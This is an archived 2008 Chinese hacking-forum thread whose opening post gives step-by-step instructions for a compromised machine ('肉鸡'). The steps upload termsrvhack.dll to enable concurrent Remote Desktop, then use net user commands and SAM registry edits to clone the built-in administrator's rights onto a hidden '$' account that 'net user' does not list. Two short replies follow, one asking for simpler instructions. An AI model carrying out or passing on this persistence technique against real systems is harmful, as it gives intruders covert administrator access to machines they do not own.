【3.A.S.T】网络安全爱好者's Archiver

黑客学习

上帝的爱 发表于 2008-9-3 22:33

双开3389并建立隐藏管理员

以下是详细内容:

一、确定要开刀肉鸡,先双开3389:
  1、先看下是否能远程登陆,看来 没有开,无法登陆
  2、把“3389工具包”内的termsrvhack.dll和xp3389.exe 上传到肉鸡C盘根目录下
  3、运行远程命令提示符,输入tasklist /svc >>c:\3389.txt
  4、刷新并查看C盘刚创建的3389.txt,记下有“DcomLaunch, TermService”特征字的进程 PID值
  5、更改工具包内3389.bat 中“@ntsd -c q -p”后面的数值为刚才的PID值,保持并上传至C盘
  6、远程命令提示符下运行3389.bat 等待成功

二、建立隐藏管理员用户:
  1、远程命令提示符下输入命令“net user 用户名$ 密码 /add” 和 “net localgroup administrators 用户名$ /add”
  2、打开远程登陆工具,单击开始菜单 点击“运行” 或 windows键+R 打开运行对话框,输入“mstsc” 回车
  3、填上肉鸡IP 并 连接
  4、登陆后,运行注册表“regedit”修改SAM权限,即 找到“HKEY_LOCAL_MACHINE\SAM\SAM” 右键查看权限,勾上“完全控制”
  5、F5刷新,找到:HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\asp$ ,然后导出 “000001F4,000003EC、用户名$” 为1.reg、 2.reg、 3.reg
  6、net user 用户名$ /del
  7、将超级用户对应的项000001F4下的键"F"的值复制,并覆盖 “用户名$” 对应的项00000xxx下的键"F"的值,然后再将00000xxx与3.reg合并,并双击导入注册表
  8、然后改回SAM的权限,HKEY_LOCAL_MACHINE\SAM\SAM点击右键权限(只要删除添加的帐户administrator即可)
  9、到此隐藏用户建立成功
  10、断开连接,重新登陆试试,成功 ~~~能登陆
  看到了吧,net  user 命令 看不到 asp$ 用户
控制面板也看不见

963852 发表于 2008-9-3 22:42

不明白,偶是菜鸟,能不能教明白点啊:) :) :)

wmmy 发表于 2008-9-4 14:32

回复 2楼 963852 的帖子

双开的教程很多,貌似很简单。但是我没有使用过,哈哈  就没什么发言权了
隐藏管理员一般的就是用户名后面加上$ 符号   这个符号的输入方法是 按住SHIFT  然后在键盘的左边 数字键4   

不知道楼主这个方法 在服务器从起之后 隐藏账户 还能隐藏吗?

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.